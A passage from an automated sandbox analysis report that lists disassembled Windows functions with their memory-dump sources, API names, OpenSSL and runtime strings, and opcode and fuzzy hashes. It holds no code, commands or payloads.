                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF623F8A5A3,?,?,00000000,00007FF623F8A83E,?,?,?,?,?,00007FF623F8A7CA), ref: 00007FF623F8B3F6
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF623F8A5A3,?,?,00000000,00007FF623F8A83E,?,?,?,?,?,00007FF623F8A7CA), ref: 00007FF623F8B407
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF623F8A5A3,?,?,00000000,00007FF623F8A83E,?,?,?,?,?,00007FF623F8A7CA), ref: 00007FF623F8B418
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              • Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                              • Instruction ID: a85c34f5a7a50c36fe70c635fdf49829a5bd3280ba5fd05f7323be48775d591b
                                                              • Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                              • Instruction Fuzzy Hash: 64115C20F0970245FE5C9727BD5353961419F447E0F4842B4E82EE76D6DF2CEA028303
                                                              Function 00007FF623F8B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              • Opcode ID: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                              • Instruction ID: 897afbefc27d387e944412d4a48e8fe26f83caa628e8bffdee15e09dbafc03dc
                                                              • Opcode Fuzzy Hash: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                              • Instruction Fuzzy Hash: 4011C220A0930685FE6D62677C5317A11424F557B0F194BB4D92EEB6E2EF2CBA418253
                                                              Function 00007FFDFAEE21C1 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 355COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007
                                                              • String ID: &$..\s\ssl\statem\statem_clnt.c$resumption
                                                              • API String ID: 3568877910-1441847574
                                                              • Opcode ID: a2a1fe7ef8bbf980694a84b1801f65fd6b1e6e9000ff944b82d81e57b58df6bb
                                                              • Instruction ID: 2021367c8832b1935b77eb94cf48a0bdf45256e9ee3681891a1434c46ffb7eec
                                                              • Opcode Fuzzy Hash: a2a1fe7ef8bbf980694a84b1801f65fd6b1e6e9000ff944b82d81e57b58df6bb
                                                              • Instruction Fuzzy Hash: DFF1C43270868185E7288B15D4647A9BBE1FF84B94F148279EEAE4B7D8CF7DD590C700
                                                              Function 00007FFDFAF14EF0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 268COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007
                                                              • String ID: $..\s\ssl\ssl_sess.c$T
                                                              • API String ID: 3568877910-2024727245
                                                              • Opcode ID: bae10787738cc56e37b62d3b1ee36bf99efdbc286f7b95d1d095db50d282c8fb
                                                              • Instruction ID: 2e3374a9e860edb8f2a131072f67c46b9ac6af9aedd618e3e30a86aa0ca739d9
                                                              • Opcode Fuzzy Hash: bae10787738cc56e37b62d3b1ee36bf99efdbc286f7b95d1d095db50d282c8fb
                                                              • Instruction Fuzzy Hash: 85C19D32B0868292E7599A21D464BF963A1FF84BA4F044275EE2E4F7D9CF3DE641C700
                                                              Function 00007FF623F85FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: verbose
                                                              • API String ID: 3215553584-579935070
                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                              • Instruction ID: 9b1ddb9f930ac8a0382179b89d1893d767a0009ce23476d21b76f577d090fc1f
                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                              • Instruction Fuzzy Hash: 9891B022A08A4681EF698E26EC5277D3791AB40BD4F4441B6DB9DA73D6DF3CE6058302
                                                              Function 00007FF623F8FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                              • API String ID: 3215553584-1196891531
                                                              • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                              • Instruction ID: d0f405f449d67e65ee606cea154faa0e2ece8266dbad4d760375eee68137ddbf
                                                              • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                              • Instruction Fuzzy Hash: 8C819173E183428DEF6C5E27B94627926A0AF11BC8F5640B5CA09F7295CF2DEB019303
                                                              Function 00007FFDFA111FA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986363655.00007FFDFA111000.00000040.00000001.01000000.00000015.sdmp, Offset: 00007FFDFA110000, based on PE: true
                                                              • Associated: 00000001.00000002.1986336831.00007FFDFA110000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986363655.00007FFDFA174000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986363655.00007FFDFA1C3000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986363655.00007FFDFA21C000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986363655.00007FFDFA221000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986363655.00007FFDFA224000.00000040.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986626522.00007FFDFA225000.00000080.00000001.01000000.00000015.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986656867.00007FFDFA227000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007B6570
                                                              • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                              • API String ID: 4069847057-87138338
                                                              • Opcode ID: c8e681eb15480172cfe4a28a3257cda92461c1a9f1febbdb02df2df24e1a544b
                                                              • Instruction ID: 17c5cefb70ffd2a6ca35e424d0360a58291f93ce4ea45f9b896989b6f2be5c17
                                                              • Opcode Fuzzy Hash: c8e681eb15480172cfe4a28a3257cda92461c1a9f1febbdb02df2df24e1a544b
                                                              • Instruction Fuzzy Hash: BD61F533F1860656E7688A19E420ABEB25AFB80B90F464375E97D476CDEF3CE546C700
                                                              Function 00007FFE13334044 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 163COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00007FFE13336710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1333239E), ref: 00007FFE1333671E
                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE133341C3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: abort
                                                              • String ID: $csm$csm
                                                              • API String ID: 4206212132-1512788406
                                                              • Opcode ID: a1e41bd14f4dc8a012b9b6851bae8dba3a2639313cd67671a1d4b299b7556132
                                                              • Instruction ID: a90e16702a4929bc110ce85055c30ccb5d38b7c9dd6f011e39a71c3422688366
                                                              • Opcode Fuzzy Hash: a1e41bd14f4dc8a012b9b6851bae8dba3a2639313cd67671a1d4b299b7556132
                                                              • Instruction Fuzzy Hash: 9A71A236A08A818AD7648F1694407B9BBA0FB24FA8F04C175EF9C77AA9CF3CD451C745
                                                              Function 00007FF623F7D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 2395640692-1018135373
                                                              • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                              • Instruction ID: 6771de1bf975fb8a274c0416582beb07759f16ba81b26082142c358f99972fda
                                                              • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                              • Instruction Fuzzy Hash: 0651B033A196028ADF148F15F845A783391FB44B98F908176EE4D9B784EF7CEA42C701
                                                              Function 00007FF623F7EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                              • Instruction ID: 58edbb9d96c1fdba07c22b43ba8ed2d15d826bac9c4030db3ee0b2c45a8293d6
                                                              • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                              • Instruction Fuzzy Hash: C661A6329087C585DB208F15F8417A9B7A0FB95B94F044275EB9C9BB59DF7CD190CB01
                                                              Function 00007FF623F7F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                              • Instruction ID: 19d2c54cf1de75fb67bc90540d3d4904e5f622de78f8bfd2453a019b6c69e10b
                                                              • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                              • Instruction Fuzzy Hash: DD519F32A0838286EF748F25E84666877A4FB54B84F1541B6DA5DABBC5CF3CE650C702
                                                              Function 00007FFE13333E1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00007FFE13336710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1333239E), ref: 00007FFE1333671E
                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13333F13
                                                              • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE13333F23
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                              • String ID: csm$csm
                                                              • API String ID: 4108983575-3733052814
                                                              • Opcode ID: 723d316c6bb1492db26d318ced58129fbbb71e04f86aecbd325fb3d3c805e488
                                                              • Instruction ID: fccac8053ff3fe759655ef7bc8140d2c01c2ce9880ac826487b77f7e360460be
                                                              • Opcode Fuzzy Hash: 723d316c6bb1492db26d318ced58129fbbb71e04f86aecbd325fb3d3c805e488
                                                              • Instruction Fuzzy Hash: 05515232908A428AEB648F179444268B6A0FB64FB5F54C275DBAD67BF5CF3CE450C708
                                                              Function 00007FFDFAFA2838 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 137COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ..\s\crypto\async\async.c$T
                                                              • API String ID: 0-2182492907
                                                              • Opcode ID: 04473f709f20d5418b9142c902fa38fe261270257c9d11945cde8e7dfee9ee7c
                                                              • Instruction ID: 9dc760b584afd83e2763e0a2a802458f8a6867d52e68a936f1d3fdd6850040ac
                                                              • Opcode Fuzzy Hash: 04473f709f20d5418b9142c902fa38fe261270257c9d11945cde8e7dfee9ee7c
                                                              • Instruction Fuzzy Hash: 3F51CE32B0A6438AE7249B15D421AB97761FF85794F405130EA6D4BBEDDF3CE508E740
                                                              Function 00007FFDFB066E10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 129networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: getnameinfohtons
                                                              • String ID: $..\s\crypto\bio\b_addr.c
                                                              • API String ID: 1503050688-1606403076
                                                              • Opcode ID: abf895892e19a7dd3f2917413c547db771b768985eb7ad20f0e6bfc0b8a981ba
                                                              • Instruction ID: 640e0d011cced2681b04583d340caefc761aecdbd6ecde803944e00c234d962a
                                                              • Opcode Fuzzy Hash: abf895892e19a7dd3f2917413c547db771b768985eb7ad20f0e6bfc0b8a981ba
                                                              • Instruction Fuzzy Hash: AD51E222B0968386FB209B11E421AFA77A1EF81744F404135FBAD4B6E9DF3DE9449700
                                                              Function 00007FFDFAFA3846 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ..\s\crypto\bio\b_sock.c$J$host=
                                                              • API String ID: 0-1729655730
                                                              • Opcode ID: fb7855fcd371f05ee0f8c06c4a9d3ff59d339786e254bf31641fa772ec444ff7
                                                              • Instruction ID: c7be1845cc172bc657c3f417dd1937e40932ed9dda6762b52fb0979bd21f8e79
                                                              • Opcode Fuzzy Hash: fb7855fcd371f05ee0f8c06c4a9d3ff59d339786e254bf31641fa772ec444ff7
                                                              • Instruction Fuzzy Hash: 91318D26B0864286EB14DB55E4619AEA360FFC57A4F400135FB6D8BBEEDF3DE5418B00
                                                              Function 00007FF623F77E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              APIs
